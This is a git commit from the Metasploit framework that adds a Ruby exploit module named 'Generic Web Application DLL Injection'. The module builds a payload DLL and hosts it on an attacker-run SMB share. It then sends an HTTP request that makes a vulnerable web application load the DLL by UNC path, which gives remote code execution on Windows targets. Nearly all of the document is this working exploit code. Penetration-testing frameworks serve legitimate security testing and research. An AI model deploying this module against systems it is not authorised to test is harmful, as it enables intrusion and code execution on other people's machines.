Land rapid7#3076, @0x41414141's generic dll injection through HTTP module

jvazquez-r7 · jvazquez-r7 · commit bcdf261f3bd9 · 2015-03-04T16:19:14.000-06:00
diff --git a/modules/exploits/windows/http/generic_http_dll_injection.rb b/modules/exploits/windows/http/generic_http_dll_injection.rb
@@ -0,0 +1,85 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::SMB::Server::Share
+  include Msf::Exploit::EXE
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Generic Web Application DLL Injection',
+      'Description'    => %q{
+        This is a general-purpose module for exploiting conditions where a HTTP request
+        triggers a DLL load from a specified SMB share. This module serves payloads as
+        DLLs over an SMB service and allows an arbitrary HTTP URL to be called that would
+        trigger the load of the DLL.
+      },
+      'Author'         =>
+        [
+          'Matthew Hall <hallm[at]sec-1.com>'
+        ],
+      'Platform'       => 'win',
+      'Privileged'     => false,
+      'Arch'           => [ARCH_X86, ARCH_X86_64],
+      'Stance'         => Msf::Exploit::Stance::Aggressive,
+      'References'     =>
+        [
+          ['CWE', '427']
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+        },
+      'Targets'        =>
+        [
+          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
+        ],
+      'DefaultTarget'  => 0, # Default target is 32-bit as we usually inject into 32bit processes
+      'DisclosureDate' => 'Mar 04 2015'
+      ))
+
+      register_options(
+        [
+          OptString.new('FILE_NAME', [false, 'DLL File name to share (Default: random .dll)']),
+          OptString.new('TARGETURI', [true,  'Path to vulnerable URI (The shared location will be added at the end)', '/cgi-bin/function.php?argument=' ]),
+          OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 10])
+        ], self.class)
+
+      deregister_options('FILE_CONTENTS')
+  end
+
+  def setup
+    super
+
+    self.file_contents = generate_payload_dll
+    self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll"
+    print_status("File available on #{unc}...")
+  end
+
+  def primer
+    sploit = target_uri.to_s
+    sploit << unc
+
+    print_status("#{peer} - Trying to ")
+    send_request_raw({
+      'method' => 'GET',
+      'uri' => sploit
+    }, 3)
+  end
+
+  def exploit
+    begin
+      Timeout.timeout(datastore['SMB_DELAY']) {super}
+    rescue Timeout::Error
+      # do nothing... just finish exploit and stop smb server...
+    end
+  end
+end
